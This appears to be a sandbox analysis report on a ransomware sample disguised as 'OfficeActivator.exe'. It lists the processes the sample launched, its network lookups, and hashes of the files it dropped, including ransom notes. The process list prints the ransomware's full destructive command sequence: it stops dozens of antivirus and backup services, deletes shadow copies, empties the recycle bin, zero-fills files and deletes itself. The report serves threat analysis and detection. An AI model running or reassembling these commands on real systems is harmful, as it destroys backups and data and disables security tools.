PID 1524 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe
PID 1524 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe C:\Windows\SYSTEM32\net.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe

"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\net.exe

"net.exe" stop avpsus /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop McAfeeDLPAgentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop mfewc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BMR Boot Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop NetBackup BMR MTFTP Service /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop DefWatch /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccEvtMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop ccSetMgr /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop SavRoam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop RTVscan /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBFCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBIDPService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop QBCFMonitorService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooBackup /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop YooIT /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop zhudongfangyu /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop stc_raw_agent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VSNAPVSS /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop veeam /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop PDVFSService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecManagementService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop BackupExecRPCService /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcrSch2Svc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop AcronisAgent /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\net.exe

"net.exe" stop sophos /y

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\vssadmin.exe

"vssadmin.exe" Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe

C:\Windows\system32\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=524288 “%s”

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 www.poweradmin.com udp
US 52.1.55.52:443 www.poweradmin.com tcp
US 8.8.8.8:53 228.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 52.55.1.52.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 cutewallpaper.org udp
US 104.21.37.179:443 cutewallpaper.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 179.37.21.104.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 69.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

memory/1524-0-0x0000000000B90000-0x0000000000BAA000-memory.dmp

memory/1524-1-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp

memory/1524-2-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp

memory/432-3-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp

memory/432-13-0x000001539DDB0000-0x000001539DDD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mltuvifn.yto.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/432-16-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp

C:\ProgramData\Microsoft\User Account Pictures\HOW_TO_DECYPHER_FILES.txt

MD5 00dd1d8e8756229b0e703bcca9c8fa87
SHA1 97412aab7aa0663cd7bf7803549c5507834cfdf6
SHA256 6d4eabdf7bf6a550fed6004e1636053785b0e877f00e8d624af2f4989a544ae4
SHA512 14f3de03ad13eaf8e9ec5175c003a2f4e585ed128a724cbc7c446c717970613f6042ad286f91126391ca7574b9d4610a7ca4e97a77167e7a4247d7e21297f028

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

MD5 a08c7c1f9d09a5e493729ff3523b3485
SHA1 d8392f27046921e1d9c32120b683f207e6f2821d
SHA256 d066f2aeebe7aae32e12b412b505b4528215bce7d9c4efb054450fb0c471d2ad
SHA512 5345d07e3818b243f4bfcef78ddbc417a108989a97954952798a2bbef2840fda289af1b1c64f4682d0ecfad52e1899858e8bd5462d22dba559c0563214cc2053

memory/1524-137-0x00007FFBCB870000-0x00007FFBCBA65000-memory.dmp